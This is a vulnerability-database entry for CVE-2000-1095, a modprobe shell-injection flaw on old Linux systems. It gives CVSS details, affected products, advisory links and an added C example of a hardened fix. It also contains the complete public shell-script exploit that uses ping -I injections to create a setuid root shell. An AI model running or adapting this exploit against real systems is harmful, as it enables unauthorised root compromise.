CVE-2000-1095
CVSS 7.2
Published: 2001-01-09 00:00:00
Last revised: 2008-09-05 16:22:38

[Original] modprobe in the modutils 2.3.x package on Linux systems allows a local user to execute arbitrary commands via shell metacharacters.


[CNNVD] Linux modutils package modprobe arbitrary command execution vulnerability (CNNVD-200101-015)

        modprobe in the modutils 2.3.x package on Linux systems contains a vulnerability. A local user can execute arbitrary commands by means of shell metacharacters.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in complete system shutdown]
Access complexity: LOW [no special conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/o:suse:suse_linux:7.0    SuSE Linux 7.0
cpe:/o:conectiva:linux:5.1    Conectiva Linux 5.1
cpe:/a:immunix:immunix:6.2    Immunix 6.2
cpe:/o:mandrakesoft:mandrake_linux:7.2    MandrakeSoft Mandrake Linux 7.2
cpe:/a:immunix:immunix:7.0_beta    Immunix 7.0 beta
cpe:/o:suse:suse_linux:6.4    SuSE Linux 6.4
cpe:/o:redhat:linux:7.0    Red Hat Linux 7.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1095
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1095
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-015
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1936
(VENDOR_ADVISORY)  BID  1936
http://www.redhat.com/support/errata/RHSA-2000-108.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2000:108
http://xforce.iss.net/static/5516.php
(UNKNOWN)  XF  linux-modprobe-execute-code
http://www.linux-mandrake.com/en/security/MDKSA-2000-071-1.php3?dis=7.1
(UNKNOWN)  MANDRAKE  MDKSA-2000:071
http://www.debian.org/security/2000/20001120
(UNKNOWN)  DEBIAN  20001120 modutils: local exploit
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000340
(UNKNOWN)  CONECTIVA  CLSA-2000:340
http://archives.neohapsis.com/archives/linux/suse/2000-q4/0596.html
(UNKNOWN)  SUSE  SuSE-SA:2000:44
http://archives.neohapsis.com/archives/bugtraq/2000-11/0179.html
(UNKNOWN)  BUGTRAQ  20001112 RedHat 7.0 (and SuSE): modutils + netkit = root compromise. (fwd)

- Vulnerability information

Linux modutils package modprobe arbitrary command execution vulnerability
Severity: High    Type: Unknown
Published: 2001-01-09 00:00:00    Updated: 2006-09-15 00:00:00
Attack path: Local
        modprobe in the modutils 2.3.x package on Linux systems contains a vulnerability. A local user can execute arbitrary commands by means of shell metacharacters.

- Advisories and patches


- Vulnerability information (20402)

Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability (EDBID:20402)
linux local
2000-11-12 Verified
0 Michal Zalewski
N/A
source : http://www.securityfocus.com/bid/1936/info

Modutils is a component of many Linux systems that includes tools for working with loadable kernel modules. One of these tools, modprobe, automatically loads the set of modules corresponding to a "name" passed on the command line. modprobe version 2.3.9, and possibly neighbouring versions, contains a vulnerability (present since March 12, 1999) that can lead to a local root compromise.

The problem is that modprobe uses popen() to run the "echo" program with user input as its argument. Because popen() hands the command string to /bin/sh for parsing before "echo" is executed, unescaped shell metacharacters in the user input (for example ';') cause the shell to run additional, attacker-chosen commands.

Although modprobe is not installed setuid root, the bug can still be exploited to gain root provided the target system uses kmod. Kmod is the kernel facility that executes the program 'modprobe', as root, whenever a module is requested via request_module(). The attacker therefore only needs some way, as an unprivileged user, to get attacker-controlled text into a request_module() call.

One program that provides such a path is the version of ping shipped with Red Hat Linux 7.0. When a device that does not exist is specified on the command line, request_module() is called with the user-supplied device name. The kernel then executes modprobe with that name as its argument, and any commands embedded in the "module name" (the device name given to ping) are executed as root when modprobe calls popen().

Successful exploitation of this will yield root access for the attacker.
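The following is an added example, written for this page and not taken from modutils or from the exploit below, that reproduces the shape of the bug and a hardened replacement. The function names (build_popen_command, is_safe_module_name, safe_echo_module) and the module-name character set are assumptions for illustration; the payload string is the ping -I argument used by the exploit below.

```c
/* Added example (not modutils code): the vulnerable command construction
 * that popen() hands to /bin/sh, next to a shell-free, validated version. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable shape: "echo " + caller-supplied name, later passed to popen().
 * popen() runs this through /bin/sh -c, so ';' in the name ends the echo
 * command and starts a new one. Returns a malloc'd string for inspection. */
char *build_popen_command(const char *name) {
    size_t n = strlen("echo ") + strlen(name) + 1;
    char *cmd = malloc(n);
    if (cmd == NULL) return NULL;
    snprintf(cmd, n, "echo %s", name);
    return cmd;
}

/* Hypothetical allow-list: only characters that appear in real module
 * names. ';', '|', '`', '$', quotes, whitespace and '/' are all rejected. */
int is_safe_module_name(const char *name) {
    if (name == NULL || *name == '\0' || strlen(name) > 64) return 0;
    for (const char *p = name; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.')) return 0;
    }
    return 1;
}

/* Hardened equivalent: validate first, then run /bin/echo directly with an
 * argv vector (fork + execv), so no shell ever parses the name.
 * Returns the child's exit status, or -1 on invalid input or failure. */
int safe_echo_module(const char *name) {
    if (!is_safe_module_name(name)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "/bin/echo", (char *)name, NULL };
        execv("/bin/echo", argv);
        _exit(127);                       /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed input: the first payload the exploit below sends via ping -I. */
    const char *payload = ";chmod o+w .";
    char *cmd = build_popen_command(payload);
    printf("vulnerable path would run: sh -c \"%s\"\n", cmd);
    free(cmd);
    printf("allow-list accepts \"ip_gre\": %d\n", is_safe_module_name("ip_gre"));
    printf("allow-list accepts payload: %d\n", is_safe_module_name(payload));
    printf("safe_echo_module(\"ip_gre\") exit status: %d\n", safe_echo_module("ip_gre"));
    return 0;
}
```

The two fixes are independent and both matter: the allow-list stops metacharacters at the boundary, and execv without a shell means that even a name that slipped past validation is only ever an argument to echo, never a command.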

#!/bin/sh
# RedHat 7.0 modutils exploit (Michal Zalewski, 2000), as posted on BID 1936.
# Each `$PING -I '<payload>'` call below binds to a nonexistent interface,
# which makes the kernel call request_module() with that name; kmod runs
# modprobe as root, and modprobe passes the name unescaped through
# popen("echo ..."), so /bin/sh executes everything after the ';'.
# modprobe's cwd is / and '/' is not allowed in the name, so every file
# operation in the payloads is relative to /.

echo
echo "RedHat 7.0 modutils exploit"
echo "(c) 2000 Michal Zalewski <lcamtuf@ids.pl>"
echo "Bug discovery: Sebastian Krahmer <krahmer@cs.uni-potsdam.de>"
echo
echo "Do not have to work on older / non-RH systems. This bug has been"
echo "introduced recently. Enjoy :)"
echo
echo "This exploit is really hackish, because slashes are not allowed in"
echo "modprobe parameters, thus we have to play in modprobe's cwd (/)."
echo

# A setuid ping is required: binding a raw socket to a device with -I is
# what lets an unprivileged user reach the kernel's request_module() path.
PING=/bin/ping6
test -u $PING || PING=/bin/ping

if [ ! -u $PING ]; then
  echo "Sorry, no setuid ping."
  exit 0
fi

echo "Phase 1: making / world-writable..."

# kmod runs modprobe asynchronously; the sleep gives it time to finish.
$PING -I ';chmod o+w .' 195.117.3.59 >/dev/null 2>&1

sleep 1

echo "Phase 2: compiling helper application in /..."

# Helper binary: once root-owned and setuid (phase 3) it restores / to 755,
# removes its own traces and drops into an interactive root shell.
cat >/x.c <<_eof_
#include <stdlib.h>
#include <unistd.h>
int main(void) {
  setuid(0); seteuid(0);
  system("chmod 755 /;rm -f /x; rm -f /x.c");
  execl("/bin/bash","bash","-i",(char *)0);
  return 1;
}
_eof_

gcc /x.c -o /x
chmod 755 /x

echo "Phase 3: chown+chmod on our helper application..."

# Same injection again, this time to make /x root-owned and setuid.
$PING -I ';chown 0 x' 195.117.3.59 >/dev/null 2>&1
sleep 1
$PING -I ';chmod +s x' 195.117.3.59 >/dev/null 2>&1
sleep 1

if [ ! -u /x ]; then
  echo "Apparently, this is not exploitable on this system :("
  exit 1
fi

echo "Voila! Entering rootshell..."

/x

echo "Thank you."

- Vulnerability information

1641
Linux modprobe popen Function Arbitrary Command Execution
Local Access Required / Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2000-11-12 Unknown
2000-11-12 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Credit

Unknown or Incomplete
 

 
